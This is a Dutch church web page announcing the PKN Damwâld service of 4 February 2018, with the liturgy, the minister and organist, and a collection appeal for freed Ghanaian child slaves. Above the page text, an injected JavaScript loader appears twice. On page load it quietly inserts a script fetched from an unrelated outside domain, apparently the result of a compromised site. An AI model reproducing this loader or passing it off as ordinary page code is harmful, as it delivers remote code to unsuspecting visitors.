;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 februari 2018 9:30 uur - PKN Damwâld
zondag 4 februari 2018
09:30 uur
Koffie na de dienst in 't Skûlplak

Kerkdienst zondag 4 februari 2018 9:30 uur

Informatie

Voorganger:Mw. R. van der Wal-Van Akker, Morra
Organist:Jaap van der Horn
Mededeling:Koffie na de dienst in 't Skûlplak
Liturgie
Lied voor de dienst Gezang 320
Welkom en mededelingen
Intochtslied Psalm 93. 2e en 3e vers
Stil gebed en Votum en Groet
We zingen: Gezang 463; 1,en 2
De wet .
We zingen: Psalm 107. 11e , 12e en 20e vers
Gebed
We zingen: Gezang 467
We lezen: Marcus 4: 35 - 41
We zingen: Gezang 445, 3e couplet
- Verkondiging .
We zingen: ELB 203
Dankgebed en voorbede
Collecte
Slotlied : ELB 79
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Gezondheidszorg voor armen
Tweede collecte: Kerk
Uitganscollecte: Collecte Werelddiaconaat - Ghanese kindslaven

In Ghana doen kinderen, onder dwang, gevaarlijk werk in de visserij op het Voltameer. Kinderen, vooral jongens, worden meegelokt of meegenomen en op kleine eilandjes in het meer, dat vier keer zo groot is als Nederland, vastgehouden door hun slavenmeesters. Er is geen enkele mogelijkheid om aan de grillen van hun meesters te ontsnappen. Partnerorganisatie Challenging Heights spoort deze kinderen op, bevrijdt hen en vangt de kinderen tijdelijk op. In deze tijdelijke opvang worden kinderen met intensieve psychologische hulp en onderwijs voorbereid op een terugkeer naar hun eigen gezin en dorp. Met de collecteopbrengst wil Challenging Heights in 2018 realiseren dat 25 bevrijde kinderen onderwijs krijgen en begeleiding bij hun terugkeer naar huis.